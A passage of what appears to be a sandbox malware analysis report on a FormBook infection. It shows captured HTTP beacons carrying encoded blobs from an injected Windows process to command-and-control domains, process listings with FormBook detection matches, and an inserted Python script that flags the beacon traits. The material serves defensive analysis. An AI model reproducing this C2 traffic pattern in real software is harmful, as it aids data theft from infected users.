                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyqoXUgnxSmEFyOdC/HSEu633mzGw9XIpVzvM9FdKIe6WZptVFm2Df3khWIgKMKxhE/jGMVLaAwWWwY2Exz0PAbv+4UURco6WJ1VVi0mBBhNLFPSiZ+c5mYgqH91LhU4grrJEiL4IT/g9p4rt5OgZ7CIjLk9W0ksa9gxjf5pEc1mnOnQZJ31a6/4KNTr6+WKRYu0oC0UUAagJRzqESHme03H+oj/mIPQYkerKpLvajATUOScjyLcE1NxE6vqhnNDBQ45oUXCOJUlWXEgA92mwlRqEe/8rE2+qhHfbzbfZEBIkoiiuFDxl+k8XC+l79LS2HzPsKIc3riheVSR8DylI3akTZ4m/AoTgrzK+T+Cx9KYDs2IH6aa/aK7lr7ckSpL1OZySAwY2XSGeOPhhOXFSB+osdH87v9MJrIt6XkZ++070e6TnbuqyLDyU9K+KpXChOQasFEkTS14Yj9RSFWYqgXbIEpZefQV5bd4GJaxUz3Ta6fJTH4gahW9LON9EjwXD6IO6VQDhpBVennjCrNAW4fiQ6/psexE+kRISTLt2mwZl4woEohiKo7f5Om68LCLerhyjq+C6bCjfTR8jCPxTq38aejbkJiwXBdBNY6H8f2VaDhGVgeCyNuwM0q/2IFPkwkWkWsufUt9kKyNwmQYkT8in0IYc8Hm6v1mci+3ccWZ0rvLqEi6fHqa7HvxsihEA3m0tYtmR3c9r+P7RgEsoBRwabg078TwnXvvQ6KJ1dYQNZPOOJXi5rDh9sJrysO6/folKue069kOujVG5vh9LWRizW5MiAoBI2IrCnyBS6bx9z6t+zq1VOvw/8ZuN8koBpDUt6boe+XvsPGq1eYGkULK9KpAST3nzlyOFhfpWoWBchX7FQpO0DLafGAg72g2FrdDPSPOQ10jfIcyfEUBnCLkIb2P+Kem4KjPzoBjlMnk8zAKmXZc/Im6aTX963TV3g2sO [TRUNCATED]
                                                            Timestamp: Apr 1, 2025 09:05:00.518054962 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:00 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49735 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:02.323060036 CEST | Bytes transferred: 458 | Direction: OUT | Data:
                                                            GET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.cruycq.info
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Timestamp: Apr 1, 2025 09:05:03.321115971 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:03 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:17.125931978 CEST | Bytes transferred: 721 | Direction: OUT | Data:
                                                            POST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=nyDFaAJlnv/5+GpsoKx6SQ8If+SSAz3kwjv3xI0mCt5JglWkFs+dR3vVfYVwN/vDmEdMIcwQMZQ50LJKeCoo93ePc1B/XCHK70f5b9NgZnpikWCH7O2EcpfV0M+rpNLxhOcVXMBz1nDZ7043t7a/ncoEu2UNHNwSiL6e+s2mCa4G5N5u4ShjE143t1kgE+2FBg==
                                                            Timestamp: Apr 1, 2025 09:05:18.088798046 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:17 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:19.959129095 CEST | Bytes transferred: 741 | Direction: OUT | Data:
                                                            POST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=nyDFaAJlnv/58n5svrx6ZQ8HDuSSPT3owjj3xJx9C/dJjH+kDZCdS3vVX4V1SPvUmERiIdcQMYw50PFKezor8neJa1BxaiHK70f5b9I1ZnxikmyH5raFVJfU1M+rtNK4hOdwXJpZ1k7Z71I3tqa4tcpPtGUYDYFLkp/32/aWIp5j1r00pjA0W1cEwytUJ9LMagPZcnMjJAUKaAhj+bXYWGY=
                                                            Timestamp: Apr 1, 2025 09:05:20.805785894 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:20 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:22.833292961 CEST | Bytes transferred: 6998 | Direction: OUT | Data:
                                                            POST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd= [TRUNCATED]
                                                            Timestamp: Apr 1, 2025 09:05:23.797908068 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:23 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:25.659905910 CEST | Bytes transferred: 458 | Direction: OUT | Data:
                                                            GET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.qzsazi.info
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Timestamp: Apr 1, 2025 09:05:26.658189058 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:26 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 162.218.30.235 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:32.116102934 CEST | Bytes transferred: 718 | Direction: OUT | Data:
                                                            POST /gwiz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.l33900.xyz
                                                            Origin: http://www.l33900.xyz
                                                            Referer: http://www.l33900.xyz/gwiz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=zPiEf1tVy4Hcs3PW4cN/XXP4Wup8JQwj/JlwiISMbMFkq7tkGiWJYatDOwZs7lNy4d57otIRnj6xBxi1nSSlKgYOZ3YeFU2+IducN9jkNKcDd4R0eJ3HBWR//X1yi+KWxJ4UedFOkoekJMO8mL8ZT+dZHOgrE/BEVMiqeiIug5SODlcp+UBwTIm9kAOt834f/Q==
                                                            Timestamp: Apr 1, 2025 09:05:32.283509970 CEST | Bytes transferred: 455 | Direction: IN | Data:
                                                            HTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:32 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Ascii: <head><title>文档已移动</title></head><body><h1>对象已移动</h1>可在<a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/">此处</a>找到该文档</body>


                                                            Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 162.218.30.235 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:05:34.821824074 CEST | Bytes transferred: 738 | Direction: OUT | Data:
                                                            POST /gwiz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.l33900.xyz
                                                            Origin: http://www.l33900.xyz
                                                            Referer: http://www.l33900.xyz/gwiz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbehkrepkUROJbatDGQZpk1NP4d0Gos0RnjuxBwS1nhqkLwYMUXYcbk2+IducN92PNKEDcLJ0YsLAfmR84X1ym+KKxJ4qecYZkuSkJM+8mZYaGudfDOhrENoWV+XSZgESg5GECjRzvlgnBICO5HHZx0FWkbUuf3r7Yt5Cn5Pvc771lQY=
                                                            Timestamp: Apr 1, 2025 09:05:34.999754906 CEST | Bytes transferred: 455 | Direction: IN | Data:
                                                            HTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:34 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/"></a></body>


Session ID: 19
Source IP: 192.168.2.4
Source Port: 49742
Destination IP: 162.218.30.235
Destination Port: 80
PID: 6292
Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp: Apr 1, 2025 09:05:37.527936935 CEST
Bytes transferred: 6995
Direction: OUT
Data: POST /gwiz/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 6479
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.l33900.xyz
Origin: http://www.l33900.xyz
Referer: http://www.l33900.xyz/gwiz/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 75 57 66 57 72 74 4e 2f 62 6e 50 37 54 75 70 38 48 77 78 6b 2f 4a 70 77 69 4a 48 4c 62 65 70 6b 71 6f 56 6b 47 41 4f 4a 61 61 74 44 4d 77 5a 6f 6b 31 4e 6f 34 64 73 4b 6f 73 34 6e 6b 55 57 78 41 6d 4f 31 67 44 53 6b 42 67 59 4d 45 6e 59 59 51 45 32 34 49 64 2b 59 4e 39 69 50 4e 4a 41 44 63 4c 4a 30 5a 35 33 41 45 57 52 2b 34 58 31 6b 76 65 4b 57 78 4a 34 55 65 65 31 65 6b 2b 79 6b 4a 6f 61 38 6b 71 38 61 62 65 64 64 50 75 68 46 45 4e 30 4c 56 2b 66 47 5a 6b 67 43 67 4a 6d 45 42 55 34 38 34 58 30 54 53 35 4c 53 73 6b 6a 6e 71 46 52 61 6c 62 6b 76 59 43 7a 31 4e 34 5a 55 74 2b 36 46 41 36 7a 43 39 32 58 66 6a 44 68 77 55 6e 6a 46 37 75 33 55 54 61 5a 59 63 72 6a 6f 43 34 33 56 71 55 67 39 2b 36 79 54 46 35 66 53 4c 64 35 74 50 50 47 51 58 64 48 4f 36 2f 61 69 53 4c 35 41 73 2f 69 67 6f 33 39 38 32 45 41 67 38 43 68 56 79 33 53 51 7a 6b 6d 44 73 77 73 65 77 42 63 78 54 42 6e 5a 52 47 6a 48 49 64 45 4e 2b 30 63 53 54 4e 46 6e 2b 72 38 71 36 46 43 [TRUNCATED]
Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbepkqoVkGAOJaatDMwZok1No4dsKos4nkUWxAmO1gDSkBgYMEnYYQE24Id+YN9iPNJADcLJ0Z53AEWR+4X1kveKWxJ4Uee1ek+ykJoa8kq8abeddPuhFEN0LV+fGZkgCgJmEBU484X0TS5LSskjnqFRalbkvYCz1N4ZUt+6FA6zC92XfjDhwUnjF7u3UTaZYcrjoC43VqUg9+6yTF5fSLd5tPPGQXdHO6/aiSL5As/igo3982EAg8ChVy3SQzkmDswsewBcxTBnZRGjHIdEN+0cSTNFn+r8q6FC [TRUNCATED]

Timestamp: Apr 1, 2025 09:05:37.692320108 CEST
Bytes transferred: 455
Direction: IN
Data: HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
Server: Microsoft-IIS/10.0
Date: Tue, 01 Apr 2025 07:05:36 GMT
Connection: close
Content-Length: 200
Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
Data Ascii: <head><title>文档已移动</title></head><body><h1>对象已移动</h1>可在<a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/">此处</a>找到该文档</body>
(Chinese IIS redirect page, the same as in the previous response.)


Session ID: 20
Source IP: 192.168.2.4
Source Port: 49743
Destination IP: 162.218.30.235
Destination Port: 80
PID: 6292
Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp: Apr 1, 2025 09:05:40.252130985 CEST
Bytes transferred: 457
Direction: OUT
Data: GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Connection: close
Host: www.l33900.xyz
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Timestamp: Apr 1, 2025 09:05:40.421483994 CEST
Bytes transferred: 455
Direction: IN
Data: HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
Server: Microsoft-IIS/10.0
Date: Tue, 01 Apr 2025 07:05:40 GMT
Connection: close
Content-Length: 200
Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
Data Ascii: <head><title>文档已移动</title></head><body><h1>对象已移动</h1>可在<a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/">此处</a>找到该文档</body>
(Chinese IIS redirect page, the same as in the previous responses.)


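Every recorded session is the same exchange: a POST or GET to /gwiz/ on www.l33900.xyz carrying one opaque field named u8S0Yd, sent with an Android browser User-Agent although the client is a 32-bit Windows process, and answered with a 302 to an unrelated host serving a generic IIS page. The script below is an added example, not part of the sandbox report or its tooling: it parses the recorded requests and reports those three traits. The request text is constructed from sessions 19 and 20 (the POST body is the untruncated one from the preceding session), and the 16-character minimum for calling a value an opaque blob is an assumed threshold, not something the report states.

```python
"""Pull the beacon traits out of the HTTP sessions recorded above (added example)."""
import re
from urllib.parse import urlsplit

UA = ("Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) "
      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")

# Constructed from the report: the two request shapes the injected process sent.
REQUESTS = [
    "POST /gwiz/ HTTP/1.1\r\n"
    "Host: www.l33900.xyz\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {UA}\r\n"
    "\r\n"
    "u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbehkrepkUROJbatDGQZpk1NP4d0Gos0RnjuxBwS1nhqkLwYMUXYcbk2+IducN92PNKEDcLJ0YsLAfmR84X1ym+KKxJ4qecYZkuSkJM+8mZYaGudfDOhrENoWV+XSZgESg5GECjRzvlgnBICO5HHZx0FWkbUuf3r7Yt5Cn5Pvc771lQY=",
    "GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1\r\n"
    "Host: www.l33900.xyz\r\n"
    f"User-Agent: {UA}\r\n"
    "\r\n",
]
# Location header the server answered with in every session.
REDIRECT_LOCATION = "https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/"

BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")   # base64 alphabet; 16 is an assumed minimum
MOBILE_RE = re.compile(r"Android|iPhone|iPad|Mobile")


def split_form(encoded):
    """Split a=b&c=d without percent-decoding or turning '+' into a space,
    so the base64-style value survives exactly as it was sent."""
    pairs = {}
    for part in encoded.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key] = value
    return pairs


def parse_request(raw):
    """Parse a request as the report prints it: request line, headers, blank line, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    is_form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": path,
        "query": split_form(query),
        "body": split_form(body) if is_form else {},
        "user_agent": headers.get("user-agent", ""),
    }


def indicators(req, redirect_location, client_is_windows=True):
    """Return the reasons a request matches the beacon pattern seen in this report."""
    hits = []
    if client_is_windows and MOBILE_RE.search(req["user_agent"]):
        hits.append("mobile User-Agent sent by a Windows process")
    params = {**req["query"], **req["body"]}
    blobs = sorted(k for k, v in params.items() if BLOB_RE.match(v))
    if blobs:
        hits.append("opaque base64-style blob in field(s) " + ",".join(blobs))
    target_host = urlsplit(redirect_location).hostname if redirect_location else None
    if target_host and target_host != req["host"]:
        hits.append("server answers 302 to an unrelated host: " + target_host)
    return hits


if __name__ == "__main__":
    for raw in REQUESTS:
        req = parse_request(raw)
        print(req["method"], req["host"] + req["path"])
        for hit in indicators(req, REDIRECT_LOCATION):
            print("  -", hit)
```

The form splitter deliberately avoids urllib's parse_qsl, which would rewrite the leading "+" of the GET value as a space and break any later attempt to decode the blob. The short second parameter in the GET (rvNTa=V4hx68Jpk) falls under the length threshold and is left alone; the hostname mismatch between the Host header and the Location target is what makes the 302 look like a decoy rather than a real redirect.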

                                                            Target ID:1
                                                            Start time:03:02:29
                                                            Start date:01/04/2025
                                                            Path:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\eoIIBcxUj3.exe"
                                                            Imagebase:0x500000
                                                            File size:1'182'208 bytes
                                                            MD5 hash:C2C8B9851E807452F57CD7A1FABEC3BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:03:02:31
                                                            Start date:01/04/2025
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\eoIIBcxUj3.exe"
                                                            Imagebase:0xcf0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:03:02:56
                                                            Start date:01/04/2025
                                                            Path:C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe"
                                                            Imagebase:0xc00000
                                                            File size:143'872 bytes
                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:03:02:58
                                                            Start date:01/04/2025
                                                            Path:C:\Windows\SysWOW64\sfc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                            Imagebase:0x280000
                                                            File size:40'448 bytes
                                                            MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
